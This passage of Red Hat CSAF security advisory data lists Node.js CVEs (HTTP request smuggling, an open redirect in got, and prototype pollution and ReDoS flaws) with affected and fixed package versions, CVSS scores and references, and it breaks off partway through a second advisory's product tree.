"AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2105426" } ], "notes": [ { "category": "description", "text": "A vulnerability was found in NodeJS due to the llhttp parser in the HTTP module incorrectly handling multi-line Transfer-Encoding headers. This issue can lead to HTTP Request Smuggling (HRS). This flaw allows a remote attacker to send a specially crafted HTTP request to the server and smuggle arbitrary HTTP headers, causing web cache poisoning, and conducting XSS attacks.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: HTTP request smuggling due to incorrect parsing of multi-line Transfer-Encoding", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ], "known_not_affected": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-32215" }, { "category": "external", "summary": "RHBZ#2105426", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2105426" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-32215", "url": "https://www.cve.org/CVERecord?id=CVE-2022-32215" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-32215", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-32215" }, { "category": "external", "summary": "https://nodejs.org/en/blog/vulnerability/july-2022-security-releases/", "url": "https://nodejs.org/en/blog/vulnerability/july-2022-security-releases/" } ], "release_date": "2022-07-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-20T12:27:54+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6595" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "products": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs: HTTP request smuggling due to incorrect parsing of multi-line Transfer-Encoding" }, { "cve": "CVE-2022-33987", "cwe": { "id": "CWE-601", "name": "URL Redirection to Untrusted Site (\u0027Open Redirect\u0027)" }, "discovery_date": "2022-06-28T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2102001" } ], "notes": [ { "category": "description", "text": "A flaw was found in the `got` package for node.js. Requested URLs are not verified and allow open redirection to a local UNIX socket.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-got: missing verification of requested URLs allows redirects to UNIX sockets", "title": "Vulnerability summary" }, { "category": "other", "text": "As got is only a transitive dependency of a development dependency of kiali OpenShift Service Mesh as well as being removed in version 2.2+, this flaw will not be fixed at this time for the openshift-istio-kiali-rhel8-container.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ], "known_not_affected": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-33987" }, { "category": "external", "summary": "RHBZ#2102001", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102001" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-33987", "url": "https://www.cve.org/CVERecord?id=CVE-2022-33987" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-33987", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33987" }, { "category": "external", "summary": "https://github.com/sindresorhus/got/pull/2047", "url": "https://github.com/sindresorhus/got/pull/2047" }, { "category": "external", "summary": "https://github.com/sindresorhus/got/releases/tag/v11.8.5", "url": "https://github.com/sindresorhus/got/releases/tag/v11.8.5" } ], "release_date": "2022-06-18T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-20T12:27:54+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6595" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "products": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-got: missing verification of requested URLs allows redirects to UNIX sockets" } ] }
rhsa-2021_0551
Vulnerability from csaf_redhat
Published
2021-02-16 14:28
Modified
2024-11-15 09:39
Summary
Red Hat Security Advisory: nodejs:14 security and bug fix update
Notes
Topic
An update for the nodejs:14 module is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.
The following packages have been upgraded to a later upstream version: nodejs (14.15.4).
Security Fix(es):
* nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS (CVE-2020-7754)
* nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)
* nodejs-ini: prototype pollution via malicious INI file (CVE-2020-7788)
* nodejs: use-after-free in the TLS implementation (CVE-2020-8265)
* c-ares: ares_parse_{a,aaaa}_reply() insufficient naddrttls validation DoS (CVE-2020-8277)
* nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function (CVE-2020-15366)
* nodejs: HTTP request smuggling via two copies of a header field in an http request (CVE-2020-8287)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Bug Fix(es):
* yarn install crashes with nodejs:14 on aarch64 (BZ#1916465)
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update for the nodejs:14 module is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. \n\nThe following packages have been upgraded to a later upstream version: nodejs (14.15.4).\n\nSecurity Fix(es):\n\n* nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS (CVE-2020-7754)\n\n* nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)\n\n* nodejs-ini: prototype pollution via malicious INI file (CVE-2020-7788)\n\n* nodejs: use-after-free in the TLS implementation (CVE-2020-8265)\n\n* c-ares: ares_parse_{a,aaaa}_reply() insufficient naddrttls validation DoS (CVE-2020-8277)\n\n* nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function (CVE-2020-15366)\n\n* nodejs: HTTP request smuggling via two copies of a header field in an http request (CVE-2020-8287)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* yarn install crashes with nodejs:14 on aarch64 (BZ#1916465)", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:0551", "url": "https://access.redhat.com/errata/RHSA-2021:0551" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#moderate", "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "category": "external", "summary": "1857977", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1857977" }, { "category": "external", "summary": "1892430", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1892430" }, { "category": "external", "summary": "1898554", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898554" }, { "category": "external", "summary": "1898680", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898680" }, { "category": "external", "summary": "1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "1912854", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912854" }, { "category": "external", "summary": "1912863", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912863" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_0551.json" } ], "title": "Red Hat Security Advisory: nodejs:14 security and bug fix update", "tracking": { "current_release_date": "2024-11-15T09:39:08+00:00", "generator": { "date": "2024-11-15T09:39:08+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.1" } }, "id": "RHSA-2021:0551", "initial_release_date": "2021-02-16T14:28:03+00:00", "revision_history": [ { "date": "2021-02-16T14:28:03+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-02-16T14:28:03+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-15T09:39:08+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Enterprise Linux AppStream (v. 8)", "product": { "name": "Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN", "product_identification_helper": { 